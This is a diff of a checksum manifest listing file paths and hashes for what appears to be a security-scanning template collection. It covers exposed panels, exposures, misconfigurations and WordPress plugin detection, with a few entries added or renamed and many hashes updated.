+http/exposed-panels/riello-netman204-panel.yaml:5bfad47255345abf7571e59495b0a71cbcd7e32d http/exposed-panels/riseup-panel.yaml:0b2f9a975de795077ef94317f28715b35c53e35e http/exposed-panels/rocketchat-panel.yaml:0d8d397b8dc17947d44e69f1bbb0046f1de9e942 http/exposed-panels/rocketmq-console-exposure.yaml:5c24573f3547885d2222c32ddc1134079848d880 @@ -5106,7 +5125,7 @@ http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b628 http/exposed-panels/typo3-login.yaml:4e116dbb08d4fa3bc3aed57ad47e38728f911996 http/exposed-panels/uipath-orchestrator-panel.yaml:1e4773c92945e1f16a1f0d3fc7adb63f2eaa227b http/exposed-panels/umami-panel.yaml:f6551441a99dfa7eae097d14e7adc8122ce8cb8d -http/exposed-panels/umbraco-login.yaml:46d422c5b866130df2f2ed65e335449ba45709a1 +http/exposed-panels/umbraco-login.yaml:2e69b5c0a626604f56d1d6549d37cb77aec521df http/exposed-panels/unauth/tautulli-unauth.yaml:79981902f98a27092e36722232b68205c29e17f6 http/exposed-panels/unauth-xproxy-dashboard.yaml:79325f88fd9da1f20167188c0b33877a3d6888a3 http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90418d6 @@ -5247,7 +5266,7 @@ http/exposures/apis/wadl-api.yaml:7a728eb7a4cb779218d582661a7fb2978abedc03 http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907 http/exposures/backups/froxlor-database-backup.yaml:cf4560e765b705926a9d81700f19784a08e0f1db -http/exposures/backups/php-backup-files.yaml:903b043b8b177efe85a09511f300db32ff3b8b94 +http/exposures/backups/php-backup-files.yaml:60d80eb233835ccab986812496a917075c9cd794 http/exposures/backups/settings-php-files.yaml:c3ed4d0da82aebfc6767c6914a17674c995b4f11 http/exposures/backups/sql-dump.yaml:ead33d26fe70e2cd7a693b7106740ac4437a4fce http/exposures/backups/sql-server-dump.yaml:6179efa38cd9c2d49b504ab40f94a857b81bf3e2 @@ -5354,7 +5373,7 @@ http/exposures/configs/phalcon-framework-source.yaml:14477a9efaa9961acae9277a1b6 http/exposures/configs/phinx-config.yaml:397a9292412cdb577652aff8a8a5e1e6365eb252 http/exposures/configs/php-fpm-config.yaml:961bddcacbdbd52f131b0e3ee197efca68dc0039 http/exposures/configs/phpcs-config.yaml:ea8ba01aef023ac28c1e57995061f1154eddc781 -http/exposures/configs/phpinfo-files.yaml:15b74848bd543b92127ba8e11b19c31e2a560496 +http/exposures/configs/phpinfo-files.yaml:9fabed17aeec11d89deb9124d39709516f2d48b4 http/exposures/configs/phpsec-config.yaml:7604d3409cdb6d9acba041d15ef89a6ba7b14739 http/exposures/configs/phpstan-config.yaml:afdd2f46a7b3a37822e7e01d2af68da29e840402 http/exposures/configs/phpsys-info.yaml:53b2139e4a26307d043ef371466083336d66b9c0 @@ -5842,6 +5861,7 @@ http/miscellaneous/rdap-whois.yaml:c25cfe8b61f82c032de77398cf1aed94f56f0004 http/miscellaneous/robots-txt-endpoint.yaml:337a577a0f8920ac88a13ffea8e98c8f626e48be http/miscellaneous/robots-txt.yaml:b010ceb0ce14e91e299184fcd610219333ab539d http/miscellaneous/security-txt.yaml:10d642099226291d14c61fc26d7ab45ac881027b +http/miscellaneous/seized-site.yaml:fd333643db3b8b71e8250b9c1b18c52df71ac434 http/miscellaneous/sitemap-detect.yaml:781ce2a2a3c42160c599d05754098f8e6ad6da2b http/miscellaneous/spnego-detect.yaml:364fc1e4dfeae4c0ccca04e53916b739785e64e2 http/miscellaneous/x-recruiting-header.yaml:03e6924cd6e71749c8aa532b544fc20adf8f7f67 @@ -6237,7 +6257,7 @@ http/misconfiguration/kafka-cruise-control.yaml:cea6b25e34ed34acc211ea0fdd6d795b http/misconfiguration/kubeflow-dashboard-unauth.yaml:6fcb31eefa57633a789d6a0eb0eec723feae0b2d http/misconfiguration/kubernetes/kube-state-metrics.yaml:73c4b04e93fa0c4fb50459db5cba099fb1aa76d1 http/misconfiguration/kubernetes/kubernetes-metrics.yaml:5f8fbe53b2d93640b7c2c585b9f1d9f10d8eaea7 -http/misconfiguration/kubernetes/kubernetes-pods.yaml:a59825a464f006e6da0ce5b7232bf24c9f60c705 +http/misconfiguration/kubernetes/kubernetes-pods-api.yaml:a59825a464f006e6da0ce5b7232bf24c9f60c705 http/misconfiguration/kubernetes/kubernetes-resource-report.yaml:2d7acc9dc9c77424c09ebd95f6f44206567f9a5a http/misconfiguration/kubernetes/unauth-etcd-server.yaml:178a6e16adb8beb36acd4ae83cd91805bae9a032 http/misconfiguration/label-studio-signup.yaml:eb4ca86202a9384e85f384b8081d94c68996d066 @@ -6258,6 +6278,7 @@ http/misconfiguration/locust-exposure.yaml:745e0cd6c0d80af70763e3e5c960a65fbc6d8 http/misconfiguration/lvm-exporter-metrics.yaml:f1cdf9f009abc6debe3fc3c58740d68b00322c64 http/misconfiguration/manage-cabinet-register.yaml:ae234231bca79fcef3260e5f188837153bca5d1f http/misconfiguration/manage-engine-ad-search.yaml:6651e9595559901ce4c1d1fa82082a53cc619b3d +http/misconfiguration/microsoft/aspnetcore-dev-env.yaml:a1c5e321eb891908532b2fd8317b390d0adb4f4f http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:acf08c26999a0c76c8ae4e4625d79d0784b61d18 http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac3db72af84f34e3 http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d @@ -7367,6 +7388,7 @@ http/technologies/apollo-server-detect.yaml:44245d09c9ad3e3fbca5d699041ac2bd23d3 http/technologies/appcms-detect.yaml:1586a4ef035d9802474a7bea98a2e3ec1c853381 http/technologies/apple-httpserver.yaml:17b86c19f29316954819f862cc7d1e371890f4cd http/technologies/aqua-enterprise-detect.yaml:50f08ae63f0b5b33a949ac9f0993afd4b05c589d +http/technologies/arcgis-detect.yaml:a3fa71360ba0eb2d83f06c8c26612527a7641248 http/technologies/arcgis-rest-api.yaml:eb38f25a45574cf0910230eb09622cdcff1e1e2b http/technologies/arcgis-tokens.yaml:d087892af21c93134acc20508b0da86a0a46da92 http/technologies/artica-web-proxy-detect.yaml:8e2fe60b79816e54a4c63ab51115c99963ffefc2 @@ -7735,6 +7757,7 @@ http/technologies/versa/versa-analytics-server.yaml:2741b172d33d7e307ee36535594e http/technologies/versa/versa-director-api.yaml:192e2e98b1b7dbcc9f276cec8508f937ce017442 http/technologies/versa/versa-networks-detect.yaml:d2a9f2c15c90a60daa5cccccfb09f6485bd82f83 http/technologies/versa-flexvnf-server.yaml:b95e8d017e6c3eba613c4990dbadd14baa39f7ec +http/technologies/vertigis-detect.yaml:24dbb3f2e0855fb89e5efaed56c7cbbd1068bef0 http/technologies/vivotex-web-console-detect.yaml:5fc7012ed4f1b6342ac2cb17ee84e9f93644c02d http/technologies/vmware/vmware-detect.yaml:4f8fbfc3da99dc2f1d4b5294463c24adbd5897c1 http/technologies/vmware/vmware-horizon-version.yaml:955a37af832933aef30ece0267faf73af3879ab9 @@ -7745,238 +7768,239 @@ http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 +http/technologies/wiki-js-detect.yaml:5a759c946be897e061a84f4ac32e3d0fb20879d1 http/technologies/wing-ftp-service-detect.yaml:92a8c8080c423ecdbe008bff39e4363d22ce995f http/technologies/wms-server-detect.yaml:5b24766a9022a18cc343b60f0381f69ce70a0b4d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:ebcf9bb7dab5d8eaa270fc88b8e05725ada98816 -http/technologies/wordpress/plugins/add-to-any.yaml:8041c961750281e03c2e8a20198ca2dd594233e9 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:55f09abfd0c42b89b5eca35b4e2768ad79d0f0e9 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:31e3254a62a5304e906b0f69b4e3f781d7900ff1 -http/technologies/wordpress/plugins/akismet.yaml:300274f03df6818f42ee72b75e02ebe19f49c10d +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e4d1ae9ca8c414849a4416153dfd1e957ed81045 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:2346763cdc1668b0bda65084be4320b1d092894f -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:b003f0527a3999468ad4a138f5ddaf77487721d5 -http/technologies/wordpress/plugins/amp.yaml:d2c1dcc4d09dc5ad306ffdbd8188ca7635c48246 -http/technologies/wordpress/plugins/antispam-bee.yaml:379a1ebe26dd5378fa90bbc4589e690c1643ae99 -http/technologies/wordpress/plugins/astra-sites.yaml:53aa75375f7a500397d25e2b1d06b7e1c7082cf4 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:231d180c0f888687a881f64984ce650a48bb8487 -http/technologies/wordpress/plugins/backwpup.yaml:faad406f3455dca328a952a9a7c5be8078cd0030 -http/technologies/wordpress/plugins/better-search-replace.yaml:0a256a7b4955f0423d4ab1182a4bbaeab52c747e -http/technologies/wordpress/plugins/better-wp-security.yaml:e5c25595992f97a6af719157528933a7d62f7a5e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:4fe4379dba76d534eb87aa06df9285ee76903572 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:615b97b038781d41d343440e2e7196cddd4db11f -http/technologies/wordpress/plugins/breeze.yaml:486643581168eaec837ef7a7a2609e19bc13cc5b -http/technologies/wordpress/plugins/broken-link-checker.yaml:8ee723f41f2b7339d391266dc19b6266a3ce3957 -http/technologies/wordpress/plugins/chaty.yaml:36174088028ac9379c5cd4be159a59058f6d4e73 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:09b779024213b3d13881cc03499066ebd35b427e -http/technologies/wordpress/plugins/classic-editor.yaml:791b43fd6284cf5d57e0569bdad210a31c8916bc -http/technologies/wordpress/plugins/classic-widgets.yaml:181fa6387840c4b02af2c6e1f7c07d5bd4cf0bcf -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:af9035c30d5e01e6862c4d553ff436365a7abd8a +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:e6fa263929b97ddb727acf431c30deac67b9bd63 -http/technologies/wordpress/plugins/coblocks.yaml:136966e00a83f6f0865550cd3aa8f5aff8990d3c -http/technologies/wordpress/plugins/code-snippets.yaml:6b43cd87f950e7f8f84f3f2f3ab79ddd5a5310ae -http/technologies/wordpress/plugins/coming-soon.yaml:642890cd3b9b2dae8e7682e426d02cdeed45819f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:526fbf9fbfdccb2fbfc96e4826619d6eab1ea4f0 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:abd1d0381764f54a6bc0633ebe2363a132aadcd5 -http/technologies/wordpress/plugins/contact-form-7.yaml:d2b0aee273f76523c7fa02f7060e51a553cb65dd -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:62dc31c0565b984ad4c79c46a3f1fcd776a46dbe -http/technologies/wordpress/plugins/cookie-law-info.yaml:b9efdf76e7de4517cab0c223de58254b16251b0e -http/technologies/wordpress/plugins/cookie-notice.yaml:5e424795bb98fdfbe11cda72bf58151d2d8a5a87 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:c75b3ccfdfd9c177b2f4e154999780e9133e9cb6 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:f750c496cfc0d207cc283aa74e21a17f8f9f51fd -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:91c15f6accd11edf3da485920afbe9121ef43cb1 -http/technologies/wordpress/plugins/custom-css-js.yaml:24179c3c86c551e096906a011aa07c57806879e8 -http/technologies/wordpress/plugins/custom-fonts.yaml:fa39dc722a6dc7947d79f92c31b10f6eb0662033 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:b6f8bca6f66f6e7fb01fb92108a1eb3ffbbf9585 -http/technologies/wordpress/plugins/disable-comments.yaml:d6729fa97dccc71a78ab8879d4d0fa3ffe2600d8 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:1bcbdcffeeeea5b4d496df9cce5abd993caf6430 -http/technologies/wordpress/plugins/duplicate-page.yaml:3a526f2c784666299d287e8f5e34dfe74984b700 -http/technologies/wordpress/plugins/duplicate-post.yaml:b339929e2cbe489a17f1a93be942c411ba4d5dc9 -http/technologies/wordpress/plugins/duplicator.yaml:ae55c48ede80bdb49b8d404984be347405b67488 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:43599c0568cf2ff81a06b10d6864132d36775615 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:02b01785c66dee2c06b91fd257f5ea08b8d557c6 +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:85ed4754232635fa21a85b407d4cff31d35387c9 +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:0169ee582b3a0e580284e1de870b87ff1399cabc -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:ffebd451e8cb5ab34afd5349fd6f1e0eb32913ea -http/technologies/wordpress/plugins/elementor.yaml:fb26731e501d73da7c6b24d56bfdd7780bbeeb59 -http/technologies/wordpress/plugins/elementskit-lite.yaml:b5833e6a36871b8c02be69111c8977dfe41c97b5 -http/technologies/wordpress/plugins/enable-media-replace.yaml:f427d72afb8753136e6e11fa225a0eac63edd4a7 -http/technologies/wordpress/plugins/envato-elements.yaml:b99d13e7caf4a13382bdc2d7760c01cd01304f56 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:42d2dbc36f66d8ca289b941f7555af721a545543 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:f98fffe5536bc77a71783a60d6e3c53987e3ac22 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:78b3c78912cbdc4c8349bef72fd8fd6fa24beb21 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:022f518e7d49f749cbf45a0e81c4bcdc60f7e758 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 http/technologies/wordpress/plugins/extendify.yaml:16df61d6c1c08c47ee240cf33df07fd008bc0a27 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:708ac2377b32a5d246358891c1a6f8a232d2f6f7 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:e3ec85ab432a9e67a389d11ed106310ebb13a912 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:55febd7249bb43dd05cf5bcc2c096b11ed2dd2f9 -http/technologies/wordpress/plugins/flamingo.yaml:f00ceba749ce07af55c33c724297cfe3bbab0629 -http/technologies/wordpress/plugins/fluent-smtp.yaml:1e080abe042eada91efa1a03a5358368c1c313d7 -http/technologies/wordpress/plugins/fluentform.yaml:9fe3803e3967b67abe1551662aec8276352886ee -http/technologies/wordpress/plugins/font-awesome.yaml:74e1f6e41731f9eb6c3efaa86d7a4fd3522d28fc -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:17447af1941422e5a1a5ed948007f29c068133ff -http/technologies/wordpress/plugins/formidable.yaml:5a6909ea8bbea4c20f9c948ad142d9ca4c4dbfdf -http/technologies/wordpress/plugins/forminator.yaml:4738e45e69d09edae615b7f8183f7831f5b40744 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:31125cf23350b89a5e706a111b723e6a378da04d -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:e6a7aaa5eb798ed165a04a6f90b2f4904f3954a1 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:782875011c940e8bfc6f8adae8fa40d0387f6fd8 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b http/technologies/wordpress/plugins/give.yaml:fc2d82b805174c1b02d60efd47f286cc8d3aceb5 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:72489439ed750399584f832f1eca8dcdd6d9c85f -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:5c7c1285fdc8196b5f389250a07558f282ed6d93 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:444c42f8ef3ceb9cf51552dd56f106291c59d0af -http/technologies/wordpress/plugins/google-site-kit.yaml:80167f63967a89bb1ca889dab892ca2d8a864efe -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:fbe990657c0b16b537bfc73bc7de84b914c0122c -http/technologies/wordpress/plugins/gtranslate.yaml:9de6069bda7f4c43c71e2be0345ba3c9a8e597d4 -http/technologies/wordpress/plugins/gutenberg.yaml:efb98670798263aaa316cd2408e86c0825859124 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:c0387f549fe57259cbe0d74621b8617ff7aa39df +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:422f0b29743abb9c3b4ebbc9ab6c361895c6ffce +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:2ce79134ffd98a0c7bb988b09009dc18a4677a90 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:3339c8872b04c2a2019605dfbe601d271b90a766 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:62dd69e0f1e605817a1d42ce38e30314cdabf9ec -http/technologies/wordpress/plugins/header-footer.yaml:b1465a89c5f89358c332090b1d924416cf304c56 -http/technologies/wordpress/plugins/health-check.yaml:4b850ca4b4e9eebba321fdc51cd6d158329f8628 -http/technologies/wordpress/plugins/hello-dolly.yaml:22bb82a05ef4483a574cd0965ee67d498e6e23e4 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:81cd3033b8a6775000f621dde28874a4df81368d -http/technologies/wordpress/plugins/hostinger.yaml:4bb9aa1afaebdb2a9cede425686e1f119873086c -http/technologies/wordpress/plugins/image-optimization.yaml:3b5455e0e07ecd39d7650b884dcd248429d430f0 -http/technologies/wordpress/plugins/imagify.yaml:e2275143c13b9f2f870b9adc3250fc46af9ddb38 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:1c6be6bc344e532324a2ddd3909f1a894db83bd8 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff http/technologies/wordpress/plugins/imsanity.yaml:319c06bed3d7611b6a05e2aaa77fb998a3205778 http/technologies/wordpress/plugins/inpost-for-woocommerce.yaml:7544703f23942190d32f575fe3f4b1398dfa3260 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:8b0df209474d527f613f72eb7b51abe4b46a20ef -http/technologies/wordpress/plugins/instagram-feed.yaml:2e1a21f8081cc5db66d4ab70c43a1dc76253b851 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:d03235a5c40e87496b5b8ff7da702294a5110705 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:4bf7bc511b03532d707b0e70d67f79afa0a07f11 -http/technologies/wordpress/plugins/jetpack.yaml:b41f35cae03dab7a7d97f7e5a9e81a71b341264a -http/technologies/wordpress/plugins/kadence-blocks.yaml:8ec0ef7a05223c04ca9d0877a404e2eda78ec212 -http/technologies/wordpress/plugins/kirki.yaml:eb052be1cd17650b468a589acdd82b3b36529dce -http/technologies/wordpress/plugins/leadin.yaml:caf1214d83d9b403d3f809a28f9275879d03322c -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:1e600557122391b87e6b82593287f568212fb65b -http/technologies/wordpress/plugins/limit-login-attempts.yaml:700f9d4e5654d56b8a5c2d473157ea19bcb7fdfc -http/technologies/wordpress/plugins/litespeed-cache.yaml:6c93835f16816b47db21798387cec044dd554539 -http/technologies/wordpress/plugins/loco-translate.yaml:9d98c54e89e9a360f7662a7f74d13b249f8df689 -http/technologies/wordpress/plugins/loginizer.yaml:b112a5c7a70103a335fa8feb2acc12b878b7827c +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 